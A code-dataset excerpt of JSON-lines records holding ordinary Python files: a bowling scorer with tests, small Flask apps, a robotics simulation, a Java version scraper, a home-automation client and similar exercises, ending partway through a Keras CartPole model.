'duke_ct'. 
However CT data is\n    #not public, so 'openi_cxr' is the only dataset option here.\n    dataset = 'openi_cxr'\n    \n    #For the openi_cxr data set, there is no 'predict set'\n    run_predict=False\n    #For the Duke CT data, the predict set consists of the many thousands of\n    #reports on which we need to apply the labeler to get a volume ground truth.\n    \n    #Make results directory\n    if not os.path.isdir('results'):\n        os.mkdir('results')\n    if len(rules_to_use)>0:\n        results_dir = os.path.join('results',datetime.datetime.today().strftime('%Y-%m-%d')+'_'+dataset+'_'+method+'_'+rules_to_use)\n    else:\n        results_dir = os.path.join('results',datetime.datetime.today().strftime('%Y-%m-%d')+'_'+dataset+'_'+method)\n    if not os.path.isdir(results_dir):\n        os.mkdir(results_dir)\n    \n    #Extracting Abnormal Sentences (Fasttext) or Abnormal Phrases (Rules):\n    if method == 'hybrid': #Sentence Classifier, Fasttext approach\n        sent_class_dir = os.path.join(results_dir, '0_sentences')\n        if not os.path.isdir(sent_class_dir):\n            os.mkdir(sent_class_dir)\n        #Safra Fasttext \n        #First, just get results to report (but not to use downstream):\n        ClassifySentences(dataset,sent_class_dir,'trainfilt_testfilt').run_all()\n        ClassifySentences(dataset,sent_class_dir,'trainall_testfilt').run_all()\n        #Now get results to report AND use downstream:\n        m = ClassifySentences(dataset,sent_class_dir,'trainall_testall')\n        m.run_all()\n    elif method == 'rules': #Rule-based approach\n        m = ApplyRules(dataset, rules_to_use)\n        m.run_all()\n    \n    #Term Search\n    term_search_dir = os.path.join(results_dir, '1_term_search')\n    if not os.path.isdir(term_search_dir):\n        os.mkdir(term_search_dir)\n    term_search.RadLabel(dataset, term_search_dir, 'train', m.train_merged)\n    term_search.RadLabel(dataset, term_search_dir, 'test', m.test_merged)\n    if run_predict:\n        term_search.RadLabel(dataset, term_search_dir, 'predict', m.predict_merged)\n    if dataset == 'duke_ct' and run_predict is True:\n        term_search.combine_imgtrain_files(term_search_dir)\n    \n    #Visualizations\n    generate_visualizations(dataset, results_dir)\n    print('Done')\n\ndef generate_visualizations(dataset, results_dir):\n    \"\"\"Make visualizations that summarize the extracted labels\"\"\"\n    #Results dirs for visualizations\n    viz_dir = os.path.join(results_dir, '2_visualizations')\n    if not os.path.isdir(viz_dir):\n        os.mkdir(viz_dir)\n    #Sentence Histograms for the notetrain set only\n    visualizations.RepeatedSentenceHistograms(dataset, viz_dir)\n    \nif __name__=='__main__':\n    run_SARLE_Rules_demo()\n    #run_SARLE_Hybrid_demo()\n    ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"386458365","text":"from abc import ABCMeta, abstractmethod\nimport unittest\n\n\nclass StrikeError(Exception):\n    def __str__(self):\n        return 'Invalid data. A strike can only be the first throw of a frame'\n\n\nclass SpareError(Exception):\n    def __str__(self):\n        return 'Invalid data. A spare can only be the second throw of a frame'\n\n\nclass FrameCountError(Exception):\n    def __str__(self):\n        return 'The game consists of more than 10 frames'\n\n\nclass TotalScoreError(Exception):\n    def __str__(self):\n        return 'Invalid data. The sum of two throws cannot exceed 10 points'\n\n\nclass BadStringError(Exception):\n    def __init__(self, string):\n        super().__init__()\n        self.string = string\n\n    def __str__(self):\n        return f'Invalid character in data {self.string}. 
Allowed characters are digits, \\\"-\\\", \\\"/\\\", \\\"Х\\\"'\n\n\nclass UnfinishedFrameWarning(Exception):\n\n    def __str__(self):\n        return 'The game ended on an unfinished frame'\n\n\nclass NoSpareWarning(Exception):\n    def __init__(self, prev_score, score):\n        super().__init__()\n        self.prev_score = prev_score\n        self.score = score\n\n    def __str__(self):\n        return f'Invalid data. Got {self.prev_score}{self.score}, expected {self.prev_score}/'\n\n\nclass State(metaclass=ABCMeta):\n\n    @abstractmethod\n    def throw_calculation(self, string, prev_score, frame_count, game_result, string_count, international):\n        \"\"\"Score calculation\"\"\"\n\n\nclass FirstThrow(State):\n    def throw_calculation(self, string, prev_score, frame_count, game_result, string_count, international):\n        bonus = 0\n        if string == 'Х' or string == 'X':\n            if international:\n                score = 10\n                try:\n                    if game_result[string_count + 1] == '/':\n                        bonus = 10\n                    else:\n                        for i, bonus_string in enumerate(game_result[string_count: string_count + 2]):\n                            if bonus_string == 'Х' or bonus_string == 'X':\n                                bonus += 10\n                            elif bonus_string.isdigit():\n                                bonus += int(bonus_string)\n                except IndexError:\n                    bonus = 0\n            else:\n                score = 20\n            frame_count += 1\n            game_state = FirstThrow()\n            return score, game_state, frame_count, bonus\n        elif string == '/':\n            raise SpareError()\n        elif string == '-':\n            score = 0\n        elif string.isdigit():\n            score = int(string)\n        else:\n            raise BadStringError(string)\n        frame_count += 1\n        game_state = SecondThrow()\n        return score, game_state, frame_count, bonus\n\n\nclass SecondThrow(State):\n    def throw_calculation(self, string, prev_score, frame_count, game_result, string_count, international):\n        bonus = 0\n        if string == 'Х' or string == 'X':\n            raise StrikeError()\n        elif string == '/':\n            if international:\n                score = 10 - prev_score\n                try:\n                    bonus_string = game_result[string_count]\n                    if bonus_string == 'Х' or bonus_string == 'X':\n                        bonus = 10\n                    elif bonus_string.isdigit():\n                        bonus = int(bonus_string)\n                except IndexError:\n                    bonus = 0\n            else:\n                score = 15 - prev_score\n        elif string == '-':\n            score = 0\n        elif string.isdigit():\n            score = int(string)\n            if prev_score + score > 10:\n                raise TotalScoreError()\n            if prev_score + score == 10:\n                raise NoSpareWarning(prev_score, score)\n        else:\n            raise BadStringError(string)\n        game_state = FirstThrow()\n        return score, game_state, frame_count, bonus\n\n\ndef get_score(game_result, international=True):\n    game_score = prev_score = frame_count = string_count = bonus = 0\n    game_state = FirstThrow()\n    for string in game_result:\n        string_count += 1\n        game_score += bonus\n        score, game_state, frame_count, bonus = game_state.throw_calculation(string, prev_score, frame_count,\n                                                                             game_result, string_count, international)\n        game_score += score\n        prev_score = score\n        if frame_count > 10:\n            raise FrameCountError()\n    if isinstance(game_state, SecondThrow):\n        raise UnfinishedFrameWarning()\n    # print(f'Score for results: {game_result} - {game_score}, frame count {frame_count} ')\n    # print('===============================================================================')\n    return game_score\n\n\nclass ScoreTests(unittest.TestCase):\n\n    def test_short_game(self):\n        self.assertEqual(get_score('Х4/34-4', international=False), 46)\n\n    def test_normal_game(self):\n        self.assertEqual(get_score('Х4/34-452Х-/729---', international=False), 106)\n\n    def test_short_game_international(self):\n        self.assertEqual(get_score('ХXX347/21'), 92)\n\n    def test_normal_game_international(self):\n        
self.assertEqual(get_score('ХXX347/21XXX5/'), 177)\n\n def test_BadStringError(self):\n self.assertRaises(BadStringError, get_score, '141/FA457X')\n\n def test_FrameCountError(self):\n self.assertRaises(FrameCountError, get_score, 'ХХХХХХХХХ111')\n\n def test_StrikeError(self):\n self.assertRaises(StrikeError, get_score, '1ХХХХХХХХХХ')\n\n def test_SpareError(self):\n self.assertRaises(SpareError, get_score, 'ХХХХХХХХХ/1')\n\n def test_TotalScoreError(self):\n self.assertRaises(TotalScoreError, get_score, 'ХХХХХХХХХ56')\n\n def test_NoSpareWarning(self):\n self.assertRaises(NoSpareWarning, get_score, 'ХХХХХХХХХ55')\n\n def test_UnfinishedFrameWarning(self):\n self.assertRaises(UnfinishedFrameWarning, get_score, 'ХХХХХХХХХ1')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"lesson_014/bowling.py","file_name":"bowling.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"381409778","text":"#!/usr/bin/env python\n#-*- encoding:UTF-8 -*-\n\nimport urllib2\nimport os, re\n\nurl = 'http://www.java.com/pt_BR/download/manual.jsp'\nsite = urllib2.urlopen(url)\nhtml = site.readlines()\n\ndef java():\n\turl = 'http://www.java.com/pt_BR/download/manual.jsp' \n\tsite = urllib2.urlopen(url)\n\thtml = site.readlines()\n\tfor line in html:\n\t\tif \"Version\" in line:\n\t\t\tm = re.sub(\"<.*?>\",\"\",line)\n\t\t\tm = m.strip()\n\t\t\tm = re.split('[a-z]+', m, flags=re.IGNORECASE)\n\t\t\tversao = str(m[2]).strip()\n\t\t\tupdate = str(m[3]).strip()\n\treturn versao, update\n\n\nfor line in html:\n\t\tif \"Linux rpm pt JRE\" in line:\n\t\t\trpm = line\n\t\t\tbreak\n\t\t\t\nrpm = str(re.split('[a-z]+', rpm, flags=re.IGNORECASE))\nrpm = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",rpm)\nrpm = rpm.split()\n\nrpm = str(rpm[1])\t\n#print rpm\n\nfor line in html:\n\t\tif \"Linux pt JRE\" in line:\n\t\t\ttar = line\n\t\t\tbreak\n\t\t\t\n#rpm = rpm.strip()\t\t\t\ntar = str(re.split('[a-z]+', tar, flags=re.IGNORECASE))\ntar = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",tar)\ntar = tar.split()\n\ntar = str(tar[1])\n#print tar\n\nfor line in html:\n\t\tif \"Linux x64 pt JRE\" in line:\n\t\t\tx64 = line\n\t\t\tbreak\n\nx64 = str(re.split('[a-z]+', x64, flags=re.IGNORECASE))\nx64 = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",x64)\nx64 = x64.split()\n\nx64 = str(x64[2])\n\n#print x64\n\nfor line in html:\n\t\tif \"Linux x64-rpm pt JRE\" in line:\n\t\t\tx64rpm = line\n\t\t\tbreak\n\nx64rpm = str(re.split('[a-z]+', x64rpm, flags=re.IGNORECASE))\nx64rpm = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",x64rpm)\nx64rpm = x64rpm.split()\n\nx64rpm = str(x64rpm[2])\n#print x64rpm\n\n#.:.\n","sub_path":"version_java.py","file_name":"version_java.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"552030020","text":"def crearmatriz():\n listaa = []\n fila = int(input())\n columna = int(input())\n if fila > 0 and columna > 0: \n for i in range(fila):\n listaa.append([])\n for j in range(columna):\n n = int(input())\n listaa[i].append(n)\n else: \n print('Error')\n return listaa\n\ndef main():\n matriz = crearmatriz()\n listaa_col = []\n if len(matriz) > 0:\n for i in range(len(matriz[0])):\n count = 0\n for j in range(len(matriz)):\n count += matriz[j][i] \n listaa_col.append(count)\n print(listaa_col)\nif __name__=='__main__':\n 
main()\n\n","sub_path":"assignments/15SumaColumnas/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438292637","text":"import argparse\nimport math\nimport numpy as np\n\nfrom pydrake.all import (DiagramBuilder,\n FindResourceOrThrow,\n FloatingBaseType,\n Isometry3,\n RigidBodyTree,\n Simulator,\n VisualElement)\nfrom pydrake.attic.multibody.shapes import Box\nfrom pydrake.examples.rimless_wheel import (RimlessWheel, RimlessWheelParams)\nfrom underactuated import (PlanarRigidBodyVisualizer)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-T\", \"--duration\",\n type=float,\n help=\"Duration to run sim.\",\n default=10.0)\nparser.add_argument(\"-Q\", \"--initial_angle\",\n type=float,\n help=\"Initial angle of the stance leg (in radians).\",\n default=0.0)\nparser.add_argument(\"-V\", \"--initial_angular_velocity\",\n type=float,\n help=\"Initial angular velocity of the stance leg \"\n \"(in radians/sec).\",\n default=5.0)\nparser.add_argument(\"-S\", \"--slope\", type=float,\n help=\"Ramp angle (in radians)\",\n default=0.08)\nargs = parser.parse_args()\n\ntree = RigidBodyTree(FindResourceOrThrow(\n \"drake/examples/rimless_wheel/RimlessWheel.urdf\"),\n FloatingBaseType.kRollPitchYaw)\nparams = RimlessWheelParams()\nparams.set_slope(args.slope)\nR = np.identity(3)\nR[0, 0] = math.cos(params.slope())\nR[0, 2] = math.sin(params.slope())\nR[2, 0] = -math.sin(params.slope())\nR[2, 2] = math.cos(params.slope())\nX = Isometry3(rotation=R, translation=[0, 0, -5.])\ncolor = np.array([0.9297, 0.7930, 0.6758, 1])\ntree.world().AddVisualElement(VisualElement(Box([100., 1., 10.]), X, color))\ntree.compile()\n\nbuilder = DiagramBuilder()\nrimless_wheel = builder.AddSystem(RimlessWheel())\n\nvisualizer = builder.AddSystem(PlanarRigidBodyVisualizer(tree,\n xlim=[-8., 8.],\n ylim=[-2., 3.],\n figsize_multiplier=3))\nbuilder.Connect(rimless_wheel.get_output_port(1), visualizer.get_input_port(0))\n\ndiagram = builder.Build()\nsimulator = Simulator(diagram)\nsimulator.set_target_realtime_rate(1.0)\n\ncontext = simulator.get_mutable_context()\ndiagram.Publish(context) # draw once to get the window open\ndiagram.GetMutableSubsystemContext(\n rimless_wheel, context).get_numeric_parameter(0).set_slope(args.slope)\ncontext.SetAccuracy(1e-4)\ncontext.SetContinuousState([args.initial_angle, args.initial_angular_velocity])\n\nsimulator.AdvanceTo(args.duration)\n","sub_path":"src/rimless_wheel/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127589056","text":"import sys, os, docutils\n\nproject = 'DyND'\ncopyright = '2016, DyND Developers'\nversion = 'XYZ' # RELEASE_VERSION\nrelease = 'XYZ'\n\nprimary_domain = 'c'\n\nextensions = ['sphinx.ext.ifconfig']\nsource_suffix = '.rst'\nmaster_doc = 'index'\ntemplates_path = ['_templates']\nadd_function_parentheses = False\npygments_style = 'sphinx'\n\nhtml_title = 'DyND-Datashape'\nhtml_logo = '_static/dynd_logo_resized.png'\n#html_favicon = None\nhtml_static_path = ['_static']\nhtml_style = 'dynd-doc.css'\nhtml_domain_indices = False\nhtml_use_index = False\nhtml_show_sourcelink = False\nhtml_add_permalinks = \"\"\nhtml_copy_source = False\nhtml_sidebars = {\n '**': ['localtoc.html'],\n 'index': ['dynd-side.html'],\n 'download': [],\n}\n\ndef setup(app):\n app.add_crossref_type('topic', 
'topic', 'single: %s',\n docutils.nodes.strong)\n\n\n\n","sub_path":"datashape/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"427342443","text":"#!/usr/bin/python\r\n# -*- coding:utf-8 -*- \r\n\r\nimport json\r\nimport time\r\nimport requests\r\n\r\n\r\ndef analyze(sentence):\r\n f = open('words.json', encoding='utf-8')\r\n m = open('machines.json')\r\n # dat = f.read()\r\n dat = '''{\"actions\": {\"关\": \"off\", \"开\": \"on\"}, \"devices\": {\"门\": [2, \"2\"], \"灯\": [1, \"1\"]}}'''\r\n # dat = dat.decode('gbk').encode('utf-8')\r\n # dat = dat.encode('utf-8').decode('gbk')\r\n print(dat)\r\n # if dat.startswith(u'\\ufeff'):\r\n # dat = dat.encode('utf8')[3:].decode('utf8')\r\n\r\n # di = json.loads(dat)\r\n di = {\"actions\": {\"关\": \"off\", \"开\": \"on\"}, \"devices\": {\"门\": [2, \"2\"], \"灯\": [1, \"1\"]}}\r\n # dat = m.read()\r\n # dat = dat.decode().encode('utf-8')\r\n # ma = json.loads(dat)\r\n ma = {\"1\": \"192.168.1.101\", \"2\": \"192.168.1.101\"}\r\n machines = []\r\n actions = []\r\n for d in di['devices']:\r\n machines.append(d)\r\n for d in di['actions']:\r\n actions.append(d)\r\n m.close()\r\n f.close()\r\n\r\n #将要发送给分机的数据\r\n send = {'machine':None,'device':None,'action':None}\r\n #判断动词(actions)\r\n for i in actions:\r\n if i in sentence:\r\n send['action'] = di['actions'][i]\r\n #判断设备\r\n for i in machines:\r\n if i in sentence:\r\n send['device'] = di['devices'][i][0]\r\n send['machine'] = ma[di['devices'][i][1]]\r\n if send['machine'] == None or send['device'] == None or send['action'] == None:\r\n send = None\r\n return send\r\n\r\n\r\nhost = 'http://192.168.1.101:8081'\r\n\r\n\r\ndef url_for(s):\r\n if s[0] == '/':\r\n return host + s\r\n else:\r\n return host + '/' + s\r\n\r\n\r\ndef post_data(url, prames):\r\n res = ''\r\n txt = '------WebKitFormBoundary7MA4YWxkTrZu0gW'\r\n for d in prames:\r\n res = res + txt + '\\r\\nContent-Disposition: form-data; name=\\\"' + d + '\\\"\\r\\n\\r\\n' + str(prames[d]) + '\\r\\n'\r\n res = res + txt + '--'\r\n headers = {'content-type': \"multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\", 'Cache-Control': \"no-cache\"}\r\n response = requests.request(\"POST\", url, data=res, headers=headers)\r\n return response.text\r\n\r\n\r\ndid = 0\r\ntoken = ''\r\nform = {}\r\n\r\n\r\ndef init():\r\n global did, token, form\r\n # 先注册一个设备,获取设备id\r\n did = 1\r\n\r\n # 获取token\r\n form = {'did': did}\r\n token = post_data(url_for('/get_token'), form)\r\n\r\n print(token)\r\n\r\n # 发送心跳\r\n form['token'] = token\r\n print(post_data(url_for('/beat'), form))\r\n\r\n '''\r\n # 发送数据给设备2\r\n data = 'Data'\r\n dest = '2'\r\n form['dest'] = dest\r\n form['data'] = data\r\n tid = post_data(url_for('/command_new'), form)\r\n print(tid)\r\n form['tid'] = tid\r\n '''\r\n\r\n\r\n#发送一个从字典转换来的str\r\n# PORT = 10492\r\n#端口\r\ndef send_to(send):\r\n '''\r\n import socket\r\n import json\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((send['machine'], PORT))\r\n s.send(json.dumps(send).encode('utf-8'))\r\n s.close()'''\r\n global did, token, form\r\n data = json.dumps(send)\r\n # 发送数据给设备2\r\n dest = '2'\r\n form['dest'] = dest\r\n form['data'] = data\r\n tid = post_data(url_for('/command_new'), form)\r\n print(tid)\r\n form['tid'] = tid\r\n print(form)\r\n tries = 100\r\n while tries > 0:\r\n res = post_data(url_for('/command_task_stat'), form)\r\n print('Waiting...\\tres =', res)\r\n if res == 
\"FINISH\":\r\n break\r\n tries = tries - 1\r\n time.sleep(1)\r\n if tries < 0:\r\n print(\"Time Out.\")\r\n post_data(url_for('/command_finish'), form)\r\n return\r\n data = post_data(url_for('/command_finish'), form)\r\n print(data)\r\n\r\n print('Finish task.')\r\n\r\n\r\n \r\ndef main(words):\r\n #words = '关灯...'\r\n #words = words.decode('gbk').encode('utf-8')\r\n #words = words.decode('utf-8')\r\n print(words)\r\n send = analyze(words)\r\n print(\"send\", send)\r\n if send != None:\r\n send_to(send)\r\n","sub_path":"Driver1/manege.py","file_name":"manege.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"135772520","text":"from fractions import Fraction\nfrom collections import Counter\nfrom typing import List\n\n\nclass Solution:\n def interchangeableRectangles(self, rectangles: List[List[int]]) -> int:\n cnt = Counter()\n for w, h in rectangles:\n cnt[Fraction(w, h)] += 1\n ans = 0\n for value in cnt.values():\n ans += value * (value - 1) // 2\n return ans\n","sub_path":"python/cache/5868. 可互换矩形的组数.py","file_name":"5868. 可互换矩形的组数.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"375812385","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef rplot(x,y,color):\n new_x, new_y = zip(*sorted(zip(x, y)))\n plt.plot(new_x, new_y, color+'--')\n plt.plot(new_x, new_y, color+'o')\n \n'''#1) Fizikinis stebėjimas\n\nilgis=np.array([0.78, 0.58, 0.3, 0.2])\nlaiko_f=2*np.pi*(ilgis/9.8)**0.5\nlaikas=np.array([1.73, 1.6, 1.25, 1.06])\n\nrplot(ilgis, laiko_f, 'b')\nplt.plot(ilgis, laikas, 'r')\nplt.ylabel('laikas')\nplt.xlabel('ilgis')'''\n \n#2) Funkcijos braižymas\nA,B=-10, 10\nplt.xlim((A,B))\nplt.xticks(np.arange(A,B+1, (B-A)/20))\na,b=-1,1\nplt.ylim((a,b))\nplt.yticks(np.arange(a,b+1, (b-a)/10))\n\n#x=np.array(np.arange(0,1,0.0001))\n\nx=np.array([-3,-2,4,0,-1])\ny=1/x\n\nrplot(x,y,'b')\n\nPRINTSIZE=6\nprint('x =',''.join([' '*(PRINTSIZE-len(str(n)))+str(n) for n in [round(n,2) for n in x]]))\nprint('y =',''.join([' '*(PRINTSIZE-len(str(n)))+str(n) for n in [round(n,2) for n in y]]))\n#rplot(x,[10, 7, 10, 10, 21],'r')\nplt.show()\n\n","sub_path":"UNCLASSIFIED/concept_vivat_cangaroo/demo - create folder of images problems in pdf/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"628909676","text":"from flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('//hi/')\ndef greeting(count, name):\n str1 = 'hello'\n for _ in range(0, count):\n str1 += '%s' % name\n return str1\n\n\n@app.route('/training1//')\ndef another(goal, weight):\n str1 = 'my weight=%.2f, goal=%s' % (weight, goal)\n return str1\n\n\nif __name__ == '__main__':\n app.run(port=5432, host='0.0.0.0', debug=True)\n","sub_path":"main24.py","file_name":"main24.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"292484116","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import F, Q\nfrom django.core.management.base import NoArgsCommand\n\nfrom modeltranslation.settings import DEFAULT_LANGUAGE\nfrom modeltranslation.translator import translator\nfrom modeltranslation.utils import build_localized_fieldname\n\n\nclass Command(NoArgsCommand):\n help = ('Updates the default translation fields of all 
or the specified'\n 'translated application using the value of the original field.')\n\n def handle(self, **options):\n verbosity = int(options['verbosity'])\n if verbosity > 0:\n self.stdout.write(\"Using default language: %s\\n\" % DEFAULT_LANGUAGE)\n for model, trans_opts in translator._registry.items():\n if model._meta.abstract:\n continue\n if verbosity > 0:\n self.stdout.write(\"Updating data of model '%s'\\n\" % model)\n for fieldname in trans_opts.fields:\n def_lang_fieldname = build_localized_fieldname(\n fieldname, DEFAULT_LANGUAGE)\n\n # We'll only update fields which do not have an existing value\n q = Q(**{def_lang_fieldname: None})\n field = model._meta.get_field(fieldname)\n if field.empty_strings_allowed:\n q |= Q(**{def_lang_fieldname: \"\"})\n\n model.objects.filter(q).rewrite(False).update(**{def_lang_fieldname: F(fieldname)})\n","sub_path":"modeltranslation/management/commands/update_translation_fields.py","file_name":"update_translation_fields.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"535424074","text":"while True:\n N = int(input())\n if N == 0:\n break\n\n P = [int(i) for i in input().split(\" \")]\n\n X, Y = [int(i) for i in input().split(\" \")]\n\n r = []\n for i in range(X, Y + 1):\n _i = i\n for _p in P:\n while _i % _p == 0:\n _i = int(_i / _p)\n if _i == 1:\n r.append(i)\n\n if r == []:\n print(\"none\")\n else:\n print(','.join(sorted([str(i) for i in r])))\n","sub_path":"primes/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280012110","text":"from django.conf.urls import patterns, include, url\n\n\n\nurlpatterns = patterns('todoapp.apps.manager.views',\n url(r'^$','index',name='index'),\n url(r'^lists/(?P\\d+)/$','view_list',name='view_list'),\n url(r'^lists/(?P\\d+)/add_task/$','add_task',name='add_task'),\n url(r'^lists/(?P\\d+)/update_task/$','update_task',name='update_task'),\n url(r'^lists/new/$','new_list',name='new_list'),\n url(r'^lists/(?P\\d+)/monthly/','monthly_view_list',name='monthly_view_list'),\n url(r'^lists/(?P\\d+)/weekly/','weekly_view_list',name='weekly_view_list'),\n url(r'^task/(?P\\d+)/date_change/','date_change',name='date_change'),\n\n)\n","sub_path":"todoapp/apps/manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"261501800","text":"'''\nCreated on Mar 3, 2014\n\n@author: steve\n'''\nimport unittest\nfrom webtest import TestApp\nimport re\nfrom urllib.parse import urlparse\n\nimport bottle\nfrom bottle.ext import sqlite, beaker\nimport os\nimport sqlite3\n\nimport main\n\nimport database\n\n\nDATABASE_NAME = \"test.db\"\nmain.app.install(sqlite.Plugin(dbfile=DATABASE_NAME))\n\n# make sure bottle looks for templates in the main directory, not this one\nbottle.TEMPLATE_PATH = [os.path.join(os.path.dirname(__file__), p) for p in ['../', '../views/']]\n\n\nclass Level2FunctionalTests(unittest.TestCase):\n\n def setUp(self):\n\n session_opts = {\n 'session.type': 'memory',\n }\n beaker_app = beaker.middleware.SessionMiddleware(main.app, session_opts)\n db = sqlite3.connect(DATABASE_NAME)\n database.create_tables(db)\n self.users, self.images = database.sample_data(db)\n self.app = TestApp(beaker_app)\n bottle.debug() # force debug messages in error pages returned by 
webtest\n\n def tearDown(self):\n pass\n\n def testImagesPresent(self):\n \"\"\"As a visitor to the site, when I load the home page I\n see three images displayed, each\n labelled with a date, a user name and a title. \"\"\"\n\n result = self.app.get('/')\n\n images = result.html.find_all('img')\n\n # expect to find three images\n self.assertEqual(3, len(images), \"Wrong number of images found\")\n\n flowtows = result.html.find_all(class_='flowtow')\n\n image_list = self.images\n\n self.assertEqual(3, len(flowtows))\n\n # each contains the image, date, author and likes\n for index in range(3):\n div = flowtows[index]\n (path, date, user, likes) = image_list[index]\n\n self.assertIn(date, div.text)\n self.assertIn(user, div.text)\n # look for the number of likes\n self.assertIn(str(len(likes)+1), div.text, \"expected to find %d likes mentioned in:\\n\\n%s\" % (len(likes), div))\n\n # look for just one image\n img = div.find_all('img')\n self.assertEqual(1, len(img))\n\n def testLikeImage(self):\n \"\"\"As a visitor to the site, when I click on \"Like\" below an image,\n the page refreshes and has one more like added to the total for that image.\"\"\"\n\n response = self.app.get('/')\n originallikes = get_page_likes(response)\n\n print(originallikes)\n\n # find a form with the action /like\n for i in response.forms:\n form = response.forms[i]\n if form.action == '/like':\n\n self.assertIn('filename', form.fields, 'image like form does not have a filename field')\n\n\n filename = form['filename'].value\n\n formresponse = form.submit()\n\n # response should be a redirect to the main page\n self.assertIn(formresponse.status, ['303 See Other', '302 Found'])\n (_, _, path, _, _, _) = urlparse(formresponse.headers['Location'])\n self.assertEqual('/', path)\n\n # and the main page should now have one more like for this image\n newresponse = self.app.get('/')\n newlikes = get_page_likes(newresponse)\n\n print(newlikes)\n\n for key in originallikes.keys():\n if key == filename:\n self.assertEqual(originallikes[key]+1, newlikes[key])\n else:\n self.assertEqual(originallikes[key], newlikes[key])\n\n # we only need to test one form\n break\n\n\ndef get_page_likes(response):\n \"\"\"Scan a page and create a dictionary of the image filenames\n and displayed like count for each image. 
Return the\n    dictionary.\"\"\"\n\n    # find all flowtow divs\n    flowtows = response.html.find_all('div', class_='flowtow')\n    result = dict()\n    for div in flowtows:\n        # get the filename from the form hidden input\n        input = div.find(\"input\", attrs={'name': \"filename\"})\n\n        filename = input['value']\n\n        # find the likes element\n        likesel = div.find(class_='likes')\n        # grab the integer from this element\n        m = re.search(r'\d+', likesel.text)\n        if m:\n            likes = int(m.group())\n        else:\n            likes = 0\n\n        result[filename] = likes\n\n    return result\n\n\n\nif __name__ == \"__main__\":\n    #import sys;sys.argv = ['', 'Test.testName']\n    unittest.main()\n","sub_path":"tests/level2_functional.py","file_name":"level2_functional.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"333586002","text":"from flask import Flask, render_template, Response\nfrom services.finnkino import FinnKinoXML\nfrom services.leffatykki import LeffaTykkiRSS\nimport json\napp = Flask(__name__)\nfk = FinnKinoXML()\nlt = LeffaTykkiRSS()\n\ndef get_movies_with_reviews(area_code):\n\tmovie_container = {}\n\tmovies = fk.get_movies_from_area(area_code)\n\treviews = lt.get_movie_reviews()\n\tfor id, movie in movies.items():\n\t\treview_link = \"\"\n\t\ttitle = movie['title']\n\t\tif title in reviews:\n\t\t\treview_link = reviews[movie['title']]\n\t\tmovie_container[id] = {\n\t\t\t'title': movie['title'],\n\t\t\t'rating': movie['rating'],\n\t\t\t'genres': \"\".join(movie['genres']),\n\t\t\t'review': review_link\n\t\t}\n\treturn movie_container\n\n@app.route('/')\ndef index():\n\tareas = fk.get_area_codes()\n\tdata = {\n\t\t'areas': areas\n\t}\n\treturn render_template('index.html', data=data)\n\n@app.route('/movies/<area>')\ndef get_movies(area):\n\tmovies = get_movies_with_reviews(area)\n\tdata = {\n\t\t'movies': movies\n\t}\n\treturn render_template('_movies.html', data=data)\n\n@app.route('/movies/<area>/json')\ndef get_movies_json(area):\n\tmovies = get_movies_with_reviews(area)\n\tdata = json.dumps(movies)\n\tresp = Response(response=data, status=200, mimetype=\"application/json\")\n\treturn resp\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"604308666","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\n\nfrom core.models.extern import BaseModelKeras\n\n\nclass CartPoleModel(BaseModelKeras):\n\n    @staticmethod\n    def create_model(input_shape, output_shape, *args, **kwargs):\n        \"\"\" Creates the model. 
